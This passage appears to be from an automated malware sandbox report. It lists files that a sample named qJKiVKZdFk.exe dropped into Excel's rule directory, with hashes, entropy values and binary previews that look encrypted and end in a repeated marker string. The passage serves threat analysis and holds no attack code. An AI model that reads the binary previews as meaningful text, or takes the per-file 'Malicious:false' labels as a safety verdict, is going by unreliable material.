                                                                                                                                      SHA-256:1A880910A05ABB08173F1B722FF5E5DBB077FFD11B81FAF3DA21C8F0332BB2A8
                                                                                                                                      SHA-512:2FD3C1B0FA26CC62C83956331A30D23FC8A07638BA89871F6F04DF5F2CC24C0066C5D2F148083006740101312C654A842758D4750EB83346A82F5594F6229442
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...|j..7.....+{.LX'.BZ...DSQ2.d,....>.f.WC..O..pq.).?..sKZ..^...h.]8...?....&.:.f....U..1.o..q..<..v..5..'....#...GC....e....,;......e>.iwK>..4..@..%..G..U?W/.....]LGo..D..q*iX?... .Q...4.A<.....W./m~.{..w.Z.Y..U.V|...._...f.PT... .+.'>..JW.T.a..@r.0i.......1.. W..E....A6w.Y.D.9hw.....+&....e.0.zz.t.u...o..q9H!..h(L......#v.{};..g.$.%....R..r.._.. ....3B..[......b..Y5..S..I_.*#.....]...^..".T>B.q.....E...^..N...........?..V.....$.D...I.9xz......p.n...u.M.-J.p..-..a.~....,.hN.wF#...v....;.....5B.;l5.5........#..2....3N..N.i.b.r..~|....GK....1..b..^.~2..S..p..?.....g..4.A..3qX.s....TZ.L.F.........s..e..C.;.8..x.........d#..D.!..?r.j:t.m.......dN...B.S^.._.....4- .......O.Z..$.=..V..|H.t...6..`.@..M..r.*...#.....dK.@...4...3...v7..[l.=z...j..n....v.Y....x......3.~..e4.y..w..{.@.0..{....8..._..........b.\.2.......JF........e'......!a._|. .yAgtR...cB.nf..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324012v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1498
                                                                                                                                      Entropy (8bit):7.86740398324356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:s/dLySI+mETRt/dNNfkbz3kCP+WNIZXgi6942UVj8vG4UarYc96zZbD:0dLygmEFt/dfkbz7PTA6pr+4bshD
                                                                                                                                      MD5:C47FE15A02E15C6B59F8765710FDDBDE
                                                                                                                                      SHA1:A7B43CFCF4E9B5DBE792D1A3C8BAECA71B595796
                                                                                                                                      SHA-256:B86FEC5243A11305B2E4ED2335836463CD6E5C0AB09FD513FD6AE9C5FBE5F042
                                                                                                                                      SHA-512:00D4495001F65BC2061224456B846A978E22533A9DA0E1DDF601C4FC55BA873D882B4EA64464A4C39F1C240C46E6DE2DC623CE01B590F1B09E55FBA17D6F3358
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.e,...N.F....TA..q...9...2........+|L......AuF.1.N...T..!P.E..j.0....$...(..,..._..6<...X......8.......T.....w...|..n~.sY.+.S.~.G.a..~.........wbWW....ht....../......... .......pc..'>^D.Vq..zX....F..&.~.I,s.zP..Pf.7._.8W..'rN..KJ....Z..=...H6.*....8p...S.5_...4]U.e..L..I(l../..&...f..[...x|.Rg.G...s1..v....U...O.gm.'.A.....'<..NbP.FF.I=|...='1.o.2.l..&.;..a..#...V..g...R9..W...I.......D..V>..O{..z..x..S%...@.W.x..E5..8]../...b'..B.x"L|L{?CB..%<..g.m.=.'.qv....}%8;y(.B.%..?...<...5.7~Ao...I...#...K.c.......4Db.P....0....y.J.....{6..|....c?.#Bc"..s.m....TC..k3 z..lR2. br.p.\ .....$...'.RML....d[......&.~'.ED...F...n..QU......%.S.......!rQ+a..l^..H;...@..BZ`3..._.P.i.-_....K.2U.[...?v.Y...h..Rv.....a.k....".MuO..u....I....g..jn..\..]J.u........w...-b...t.B3.]{.I..|.o..5\.X.)..'...q..n]:....2....X..O.......R.?_.B.r`.|...%Oe.N...DZ..H.4.G......o.........Q..........*Y( n......f....s....hSWm.8LExe.0V~..f.)..U..v......*A..%.....\`

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324013v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1357
                                                                                                                                      Entropy (8bit):7.848795278350219
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:aHpv9/X7YRASzigWQxrw1IA/a2tCApg5TUFBQZtW25rgN0XbD:+pBXnSzXf23/akCd5T1q25ryeD
                                                                                                                                      MD5:0530DEADF8CE3982A166CC08851A2760
                                                                                                                                      SHA1:C1E42CC15EFEF97C52A4678A50F5D4B26DD74998
                                                                                                                                      SHA-256:FA9801F3ADC55557225EBD507D4E34D8A0B0BBD6E65772193B69CF9F85522F14
                                                                                                                                      SHA-512:BA7A703F6476265C044173AE580C04F4A8DEA9D9BD199CB41D7C3F8FCBE095C8D5A4D4591F99AFDCF2B7070EF835BE922B965CF3D4BBAB1EB22635AC2EDFA25A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml)c.S.h....%.)6..].w.:..U..oA.}{.1.25.....Kn....T...;\j'..1.R.W.%....m0.W..Z....4..T.f>!.C_..8...x..A....4A....9^y.B.'!.?4..2m.W..h^W_."..Z...A`..DA..$......H.f...o%..........l.&..#0F6.W.@.U..bw..1..T.1P.zbfT*e.....tXI...w...V...28.-......<......1...6>x3.....7{~.g..\...NNHa.vj.4.B...............H.$AG......fy.v......J...F...iZ..QB.m..|c...?.{m.g....X.s.4.\.n.{Z...O...e.M*?w.m.K...Q..o..$|<.........r...6^...w{.....=!.V(.A..=..L1.d.....Y.l.k...Ql.M}....!.m...d{.m..2.igJ..e.tR.l.....vZa#.~.).T.x.'...d..V.7....k:%....G0..G.C}....Ah.....Q1Rqj.="l.%..\..3...<ako.\.......X...-........L.Q-.-.Jn.D.....'0.jh..|...lY..".....s.r...-.)..?...v..!.\.i'...]..N.`.]..MB.|....64..qQ.[..H..C....'./J.M,.,a)e.&/.=.0;sZ...h...'-..?H..........<sO....l.R..0.Zn9V0..`..O.......[...Yr.<s.....B-..6PM.:..x.n...2.l.gQ.d.q.n(F..E.)...C-D.=;.../...jMC.=e.j.*.....8.....L.f>M......ok.Y.GjS...k.~6...Z.}$E....._..e..}...p.5...[}.L.Q....{....x.0.O~r#8.{Z...Y._...wt_.D%..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324014v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1049
                                                                                                                                      Entropy (8bit):7.806889502589541
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:tpFjSB0EqyP2s1RkN3shxDxVHUTzYJkbMRkVXVqR/HacMWtHGbD:tHI0ED2zN3s/DxV8HACeJHdUD
                                                                                                                                      MD5:4178B8B9137FBFD04887B714C9EE91DE
                                                                                                                                      SHA1:8C226045E2635025B70254052603916709DC1C35
                                                                                                                                      SHA-256:6ACBF16D765BB16FC53D026F2F87674F3409A9D22DA83EE7ABEBE53C281A4700
                                                                                                                                      SHA-512:2199448BF115EBEE5B425E12183BDBE010BCF05CDA3BF0AED4CA7A780847511C58BEF2517A2F444586A7A22C09AA2921CEFF949C5AE8C78A56ADC069F90A03EF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlI....Iu.Q.yv.NJ.N.0.p[..=.7pN%.cJ..k.Y..._...kl...RR.;..........B...k...V.Pj\...8NI.5...$.y~H....K......,.Xb.q.h&....,Z..qe.M.=..L...T..k.y........0Vo.]....d8#J...q..@#.*.2..0........rG.v......y...........F.,.......L...h.`OQ....XQ*......r\`.5D....G5#..n.+.X&....~.F......[nD........ib>c.V.Rm.^.J.......Y>.....]i.XKq.h......>"...J..{.J(W9~OM...c!.O.L-..i%)...|.0..O.d....;....I.....z.O.......I...r.h...sP...8.....j.}....Jk./...zp9..yq...qR`..>b.......o'.4..S.z'o........+GT....+&[B_e....s.L.T..sY....W.......f....|k.x....&_..Lu. O...e..d.. .lx/.zv.J.h...I..."..l..........D.8.bD.FtH.3A..=2..U.n.iAq....:.B..x.&....G..{tP34.c.w...;.z.....z+..j3....-..A.$.|2.......#...)...}(..4....P/.x..Ty3]'A*c.Z.N}]...._\B..E.SLxBit..2.7>.... u.x-.+..Z'....4.=....;.6...r.Gj<<ne4..t.....S?.....zM2A..`.....L....28..............5...0U.F..z.Q#..<.y.-._....v^..}d.y.....v..n..e..S.g..3..e.n.20.2}..L..$...D_.B.....].o....N.....ry.#.~.:tp8qj68iQwedJUixDcnQEpfFZzicx

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324015v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1184
                                                                                                                                      Entropy (8bit):7.822337335599646
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Wpi0JemP4SkwHZRxYqxuL18ifqmayiv8Skkmq3hT7bD:EJJeIlkw5RxT4Sifx+htZ/D
                                                                                                                                      MD5:363B2BF0A3BD5061341DD7E897B503D7
                                                                                                                                      SHA1:764BDFB250067F02FBB2E28A24D881FAFE77625F
                                                                                                                                      SHA-256:B1DA492D24CDBA942EAD973995998641F01B57AD4979CC887E94178A56D44970
                                                                                                                                      SHA-512:52603E1C3F49F5F55F713C91A5CD9213569289C3018ADA96EB1BAAD2CC2A924D19D0F04E77B2ADD078BDB837FD973F58A8907489EB59CD512BE64DD93DD6163C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.E.9..i'zn.s........*.^E.....+#....0.vsu...%.......?:KO...Wd....\..F.r.n.....).s.&..UT..Q..3.g........{.. ......F...............l.#.........'...1..*..4d...0........Ss.cfc.O.'.H...,..Mv.{.Y..Y.A`.......Hm.r.JF.[..f...5...u..].v..r.$7.A<q~.rv...!.k..#..j....<=..G ...'.k...s.=.:r....uT.z.f.N......J:..l..Q.-p..jZ}F..;O...WRw....}.d.:.%[C...Y<..R]z.b....a.t0u.QO.U.....bPjb.Q3..?0.........xNb...>.{...n.!@r....y........h...-if...].......3...+.5...j.#.+gsAI.Xg....ranV;.Y. .....o...._..i.c.....>.....J5..=..a.........X5.....3..fpEZ.GF.O.|.......+A.u._...q...<8.C. ...)+........gd.(e-..4_ .gmR......ld...I.J9._..q|u...u.4.\.W%.<$...!..aV'.#i.F./$]..j`.U.^v.ia{=i...=I....o.<\.V..N.>.[........'..v.pW....o...wK..s5*5........o........q.n..z!B...sJ.ITi...^.....U..._}.E.Q...:...~Pf...)C..<..\+6.W...|....^...]^o.rGX...Of..9*euk.<;....V..g....Z..6x..b.|u.............w..kl....DG.........4+$V...'...PND...-.J."c.(.A.n.|..n...r.1#?]}.x4...?]....a.h...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325000v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9303
                                                                                                                                      Entropy (8bit):7.980300227113492
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ihB4Qabe5M3SqMy9MtZbQ8a1IajPG0v0im3CHezuGWC:MVa6C3SqMyW3bJCVv0iY6GuS
                                                                                                                                      MD5:3C931CEFA24AC3D2C05D17786FA0689A
                                                                                                                                      SHA1:3FBD9E9F747C3C1218A62AFCDCF176350F507A63
                                                                                                                                      SHA-256:0DE64D817E5110CC371B259864579F5E76628ADA02299580B2E4C5813BC1D9C4
                                                                                                                                      SHA-512:E994D79530E2F413A2E12A0D188692129475436F950145C1E7B12621E959462761FA7E6174883CAE43B98DE98B9AE11D6DACA17AE0DD09BD74CF84408AF7F6A8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.?.b..Ni..y....g...W.;......Bs1.}..X..g..l....,.....E......I"e..a...i..}#7=Br.E5..2..U.4m....P.S...?.t.Yh.xBa1..$*Y.0...66/l...=..^l..IT4....V..6.W.l.L|.,./]i.....R7).3...K. .....w.5...yB..B.(.v9..|..fc.Y.....fI[$$w..!./$J.r.o].I.T.jm.|?.C....m.....DY.......-.1.sDj.B7O,&....i...P...." .7.O....q...k?....".../.:..}.q.....$.d.Ce.M)1~..!a\A.....%J`W..U...N.o-2hV.3.f..2.s.W.<..Fx.soW......J.N`#...Erl..L.!...9...S]MP6r.-.c...X..V.*..*.Q~UT..O...6......:n..<.Y.O.?.h......)....8.k...rk........4....At...M.m3p............tZw.w.<..M.+.,)....(.M*{X...!/.8.>.2+........F#...\xh.....G.IB.4yc.9..$[...vM....a...s....\.....7...5.....B.7....J..l]1.:.Q..{ X.lC.A.E.,>x..s.\. I.-..c)&.@...Uv.)..F3.#Va..8.Uy..-|nk..@.."......;......i..c..1._<..Em..W..F.._..Wz....Yj.........-.xO.....:.+..K...a..?#...s?..k.9......H...o....&>.u.-..;...e.<x.i4.....eA........Qy.@.x.....!.Z.yV...(.^...B..&....4 E.o..O...N..2j..E.x.p.;....V.4.. ~I.R..O....qh..W...%...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325001v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2318
                                                                                                                                      Entropy (8bit):7.9179681323564255
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:12J0S5OeAl9FSgKwAC7G2qxAy6T0nIvJm6lN6tOgRqZ5pWxM8jXlD:wh51U9kgK1C7IxXu5bw7RqvpW5p
                                                                                                                                      MD5:9F643AEB832AB6946BFAE320F4F1309C
                                                                                                                                      SHA1:CF20549C10A609EC3FF8E651DFECB7EA1B66F9EE
                                                                                                                                      SHA-256:1A384893933C472FE5D3F566ACE1E461603DD9F7827962DEF115208069F56A5E
                                                                                                                                      SHA-512:25B092A642D02DF88C89F647E77FA8653184AA46922FFC1CA352AFEDBCB6D5A054D910305159B973894A526F54931BF5F71E3C7CDF9606C9D2397A96F02C1AF6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..W.l|.s/G+.q...J...=zhY.Rs?@..W..dz..V'..K..uX!.@...,...9....k).......'...V..6.j.E...i...)....k.y.D.wa.B.OF.r....u..Y..E.U.\...gL.0..c.f.......G.....9.@..I...#....... ...BC......B.2.4'G.^Q...|-.....2..=b.."...-b.z...OI..I`.B.A.(.u.N*N(W+.....$...r.E.y......Npx..c..Z...HKj.......f.....q..I....f..~!A.0.Zn%.K....t..K...A...]....A.....P...[2.B:....X.+.......:...>.&...+.0.._..X...s.#am...W..hD..........L.1..].m.W.x.M..Jb.l.~....>...W3......e{.....`GE..A....Vk>.W.w...B.6L..[...^.J{...... V#..z../...E..}..i.._7..N...l.."Z..nuP..H.X..h...~.....0...1......3Pa[..j.z....%.VZ!...k.J.na.d..u......\..v....U.j)L...\.......).S.Zk!.+...(.Y.....l.&....\G.|(.'....H....Z..'8.g/....!..;..nC.l...4.....F#....O!.Y./X,7..|...h...<.z.N...Xvh.@P.........~gT.&e..V8..0.$Vn....I.~..6.....KwG.....I...Me+.IzaM.7...j..0.B..rw...Rs...#{y.;...L.jo..er....v.*.....x.......j_....5.'..Fa.*%...4..+...u...W.>.?tn.f.L.`...~I"q..Oa...&tK.. D/.w~.......k.}.&....7..Kw|m%

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325002v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2388
                                                                                                                                      Entropy (8bit):7.914761508890212
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:syfqqD3cf1lVNwmd6FOGpSHsZOD/ihY2vMG/wOzPxcwD:swqqDu1nNb0OcY7iz/wOVt
                                                                                                                                      MD5:7CBDCE4D17914CD36FD89F04487F2CDD
                                                                                                                                      SHA1:68F7257D73BF4ADDE3A189C11BF84708A613387B
                                                                                                                                      SHA-256:5874AE20ACE337571D6F0B7F42DB4FDE86F523272A6FC7B6B3BA0C13E0325543
                                                                                                                                      SHA-512:53CCE5D20E87FB0F637781D19593372804978E4CE970A980DA2C3FA6BDB34EE601368BCBDCED11283CCCACD3DD29FF0993FC6EA7A2978155114BACC75BE5C324
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlG.{....V..2.....Q.<.....#.x.c..n..2d..e.....5..6#F.C7.cr...90] .l.gz{...pCL...4.....4..kbv....~:.*.0.....TCH....:..SN..U ^...Q..a..s....J....x3..j.n.~. .....z!.#..7.p...E.f=A.E....<..&q."?....L[.u......o.&.e....3.}.JL...Lk.m.-...... M..../.K......q.1..Rj.R..........T..8...../.4....Q.7.=.K...m.2eCF...^|.......X.>dv..(.D...=C.^#..~!b...,........*..v...u..F...a2..}?W.4...-\h3_.\...)l0^..0.N...C....TUe.....y.......U...~`.. {+..f.b.8...M....m.T...].H..{.e....,...x.......#.9.s.Z.N`.T..5.......a..d.;..0P.f...7FK.).......9.....=.CF@....gE.>NQaEu.O...%..\...A..j.er.)..'...n.nCq.fQ....S.Z.....%.j.B...._..c....E.n.6.@..yzk..GTj........K.-.%zmw...hO....n.J0.mP...4..-..S..%.':.k..y.........*.tS.tZ....9j....-.=K>.)B.!....5....{.....{h.)m.{j.g.vI.......{+=....I..r.a.....8l.."Y."#R..,..ygKX...<..p...@.c..9.m9hL..;.K.D5..~.o...Z....m...!.<.Bn.i.....6_..F...&qt.D.M.lxC.c^..3..&......$..Czmc.E.D..!....T...K.hj..{.Q.2.IQ.....uS.....z<.VU.%.e..b.M

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360000v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1197
                                                                                                                                      Entropy (8bit):7.831232297205587
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:370xiUhmIFhBxwbi5k9zmVch7EqhpMrlBYH2dKRiWXlVbD:370gUhZXxa9AVwRpMJeZi6zD
                                                                                                                                      MD5:6454F261FA28CE7087359C6073794A54
                                                                                                                                      SHA1:A41EEAC38DDFC7D7EAB24AAC4AE20B3000DBDB0C
                                                                                                                                      SHA-256:9F0F9C837D8A06CEE0CF57BC8A0219BC713495DFA0D9A4F1E22338B5795BC57E
                                                                                                                                      SHA-512:B9D14E3CC73DA9C8D5C7F59E2A6543FEFE06881D7FC9D3A30F56979C636C2D76C3A01E2EC16391CD0473A257928F8159AA69A0ED77EB1B6036B513D0F8CA98DD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.k..L(p8....Kk..V....B.wR].]d..!.t.._..M79....G.A.?)..r...4.V.Qo.SKz...?9.i....../F;.....6...|.?..L...o..L....a}%...:....*. .Q...,.27..N..<..E34..."c......&..$Q_...LZ..l=t}../N..>XY...X*... ....a5..AtZ.)L.j.b<.]...A}.P...'..].".....(......n......f.........bV....]dEO.m....G.............P.6.....\...7.Z..L.....Yt...-..;...CfQZ6.[.OUH.n.~P.TM..P........T...cxP?.p......T..C Y....H.....F...W..:..:.......:.....!mo.S.A..5.........B.....\..UU....8.x..-.7.N..B..2-...QR..........Q....fM......!..Vx..)..n.../?..&I!%.x...Tk.o..........c.<|w..n.K.n............t..p.*N<c.`...p.$..[.B.w.......}...~$1.$..D)..}...?..sH}O.G......y.. .%.<..=x....._#..*u3.3..2'B$S.@C...x.b.....~.G...?..\.f......ob.b......o.{-.YO|\N.5*...=..V....?.z..N..ed&v...u......+N.U...d.S.!......C...3..`.. ..mJ.%i._..I.o#].....@y...V...Q..9j?...228..[VW.......P.&T..3..1.n..F.'.a9.^!Y..r..6...oqw}.,..h?....Lt8..;.[U....mq*z.qK.....ES..*.]p.@....;..$....J../.l..!......O.........].sm.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule360001v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):771
                                                                                                                                      Entropy (8bit):7.692087302267789
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:phTWEn6hToOXqI3X4vzHCeIxoKoivTHQFhQbD:phlykOqIH4v11KdLQjKD
                                                                                                                                      MD5:C3AACECEFAE10CBF27592406A2266977
                                                                                                                                      SHA1:3F78B869F5AA6A6E2F7465652493A24055FBE59C
                                                                                                                                      SHA-256:069B4B0A945EE3A15ED550F1529518204C31CC49A19FE957630A91CFC7244DD6
                                                                                                                                      SHA-512:9E6CAE19C7B31499DB5A1F6DA2BF9B2314B744A9C02C4456250BEC021A4528651B8E4F89D3EE86ED325D0671419611A54FD39DDD9A8783AAB61A937709655F05
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..G...$..+..{...N... Q..5.6.9...k.....A..b....bs..C.,.*...0~0....9..7. .{.y3...s....z"..C..D..`.......)..t..".V.M.r.w.E.0..L..`..#.....@.J.-....,...I.Ql.)/..|\..\...Y....xD.....a.....H.%[.L/F...eX..&.eF..o/.}..Lm. ...!<aSto..Q....S...cm..Z58.s.SC\.t....N]9 e.....q}.%.a.]b.l.v"..$+..S&...6..0^..b4....:%...u.})..U.|S.......[..V....6v?..c^7..u...2m..(t..S....Vp.M../....9.1.UIk..Ird4^.Hq.|L..y...5.Y..Iv..........Vc.j.Uj..v.>....).d....10....).x...T0u...v..saQ...yY.m.........:-..Q..G)b. .L'.tk\CL.j...h.(:.......0.T....`.."U......Sv..vc.:.~.m%.EX0.s.9{.Gt])t...oYiA.c.(....P.....dZu.,...H.7.....}R4.M.Z.'....d`..w......=.n...Xpv.k.m.Z....).'<2kf.p...Dtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370000v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):863
                                                                                                                                      Entropy (8bit):7.763620150167714
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:pYSFafdX+IpMNM6ejzc9rkSSI+2MBwHVQNcbD:pbafdX+IpMNMpzc+rjAOoD
                                                                                                                                      MD5:7D7807BF80A0D80DB89DB789596D50DC
                                                                                                                                      SHA1:4F231B560680BFED4A817B5AE7EC4E2A5A426B56
                                                                                                                                      SHA-256:DA61B495644CABAD2D5616D7F571547C8A50258CA16C7C1CC82C01D0A0113755
                                                                                                                                      SHA-512:DB1F63B1FA804536D83B7EA789FA00FC8BC967323B03F223ECA92E69989F6187AFF836CAC3785534BF9714D56F389B264CC98EBE923B1596526B08D941A27ABD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml2..U...8........f4..2.0....8..j....).>.#(..`.#....#.3.........e5...1.._4.-P......&.t.3.._.k.W..^....T.;.g3..w..*..L[j.?.....c.:.R..k..Y....O5..;.5........)..K.Jk.WM.....Ow....c.8.}.....'.>UH..!b.s.W..]v...~.Z.3q..k..wh...>.C^`.O(6.8.".|..n_%. .0..*..v....9.S.T.z...c....J...\".L..]h.D...-.vYN..-a.k...X.@...|...v..x...,..!.+...O...k..K.}.R..~.......^.u..l.......E`.Xw.Fd.yZ...E.:...&+...]..!.N.L.Y..N.&...Q..4..U]...w............'..1.:.;...[..0....M....;#...T>.....wiGD...x..L.T...."..F....*'A./.B.'.E..sc.).....G.py;..._.....c.:....j..'ko.r_z....B..-ELBd."U|pu_.|....S |{su..::e/.y....4IN._L=|l........@!k]....u..N.....Jv.....M...'..bI.-.....o........f.N<.7..eqD.I`....?r.?Z.....2.a..>...0.h&.f.*<.=V4....?..FG.|....e.u.M.r}..:..]..>.%.Ltp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370001v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2604
                                                                                                                                      Entropy (8bit):7.915566707879264
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xKFCdvAj1f9eliPDQo19ySzj8L/XsvbLzMUp+h8OmqHP4XEct/ID:xKFWEf4iPDhzQLX4PV4hm7XtU
                                                                                                                                      MD5:FC85EB83B298E0F6D20953BAA6325108
                                                                                                                                      SHA1:5F1692EEFFA791B72E515C89A7D08FDA38CEE73F
                                                                                                                                      SHA-256:D6AEA330E9C1F511B0C86E590B3EDAF58907C40FF8D838E700470D2AFF74F225
                                                                                                                                      SHA-512:2B4C418F75FD998D0DE65C9F07DB5AC80C1F43125AB0621CEF0742ED014CF134FD1CAA172475BBFB3CA6E651F1226FA6AD65D82CACFFF72F792F18A18B60A526
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..c<p.%..E...#.p......YA....l-.v.R...3.U,..m.U..*....YP#KJ.[.........D..+1.$.8...^...3...<.....K..?#l.&...<..I.N...-G.Q./6.....=.<..../.g...p.-. .....^b1mF.....N...|dg..S`.([.V.;'..$....@.}Y....x...nn.q7...hS:..... ...(.)..tW#...z...T4P..2.5;.c.0........-"..u...N....2......|..........9E..K B...k..!s.;..%..7Z..o Q....".....0....`Wg.....BL....$.,.Qp..HVZ.]-.....g....{..`...............U....B[..T.A.h3..>...8...W.8<)I7..w.h.[..zC.=...Y.%@...(....pV. ..$m..#..........f..V.30..t.M+....^..H.BPN...IzF=.P.L.ln9.d.w.Y.4.m.)E[...e.^....../.7..n.....(......U.~t......l....9h..h.\....;MXX.......q..1...........k......k..D.Z>`..F..d.y...UF-M.e}..F.8.8.|.v.R....@.MfO.....=..I*...=.o2...W............~...6..F...M..Eh.u.y...RO.ds2..x~..*..sv.fN&?...)YM.%.{..!J....w..P...p.a... ..a...e.....)3l..L.1..m.......;..j..........1E.f<....}i...k..._K .5.._..."...> .*P...:>..6u..e^..q.>`..E....).).X........98.,.=.....>......K6L.{."`..[.V*F}..k...."94....hO.{.."8.x.wAwZ

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370002v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6109
                                                                                                                                      Entropy (8bit):7.965968766736502
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kx3QAJtAP9yBXSbLBUD0fb1Gk8ywUpnsQB5W3W6peNmCrKX0txdsLD3HSXG:kx3pJtA1yBXSbdz1Gk8yBsQBI4NmC2Xh
                                                                                                                                      MD5:E79C7C0AA195B20C200570B5FAF3CA7B
                                                                                                                                      SHA1:A66675FFBFD46AC856D0EF2F113006E7262DC23A
                                                                                                                                      SHA-256:D9C81B7F9AD605BAC86CCA9D4A76018F1D9FCCF784C593F3546C2FC04B81C207
                                                                                                                                      SHA-512:75BEF44245B5B98AF6B5BADBC3F719A2B0F53F938E6C4535BB6EECA2FF3ACB64B53DA544BA8397AC08CA0501A1467BA306DE74B78C2A003E188C0E3B1369FF99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......C"..|./Z..T.,S.R...^am.aIJ.6.8.=n.D.'......^m|....T...J.|x.b.Tc...O.:.\?k..%....i.>s!....>.o.@m../?.V..KDW.Bx..vU.?.......... u.R.\kRl.d.H*nt.N...$.o.......e..x..5..........`i...IZ..0.?*..w.+..{[.A.a6..!..{....t.....[v..z."f....,...]}..Nz..Il'fyJ.i.$).0..}\R..4.R+{I.[....<E....!V.&...qv.r.1+......w~...<.z....p.*N......f......../.IU&.Xq.6#7...k.+..._,..T..........k.M.....v.pB..m.H.-K.M[...dp.;.....7....ke.}..V........p.n..<.y.7i........J....[.. .......6h+a.H>y.-B.l..\+..&.x..6..H.6=L,R-.5.^.b&....2.%-.Cb......)..F.-r).....+.W.r.p.3j.N...(...Y....;.O..p...m|..&.:.Alo4...h!...m..q..~..Ty.. .V...EF..g,J.|.........8.w|...}.h.h....%G...r.p..X...y...~b.-.2.......i..j.e...t........|rzp.yWi.)6.:.2.@.eU...f..3..[RV.*..8...z7..N.W........L..\.W.*.n....1...O.D.......ZY.6.`Pr.;....S.t."t.df..tIT;/.;.2....YpR..1...`..$.!;U.&uU.r.I.DK..x...C....#...D.U...T.4..9....W....F...OIbhas...k0..#..}..4...`.?.G2.]`.X...>.....t.(....\...).......@..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370005v1.xml

                                                                                                                                      Download File
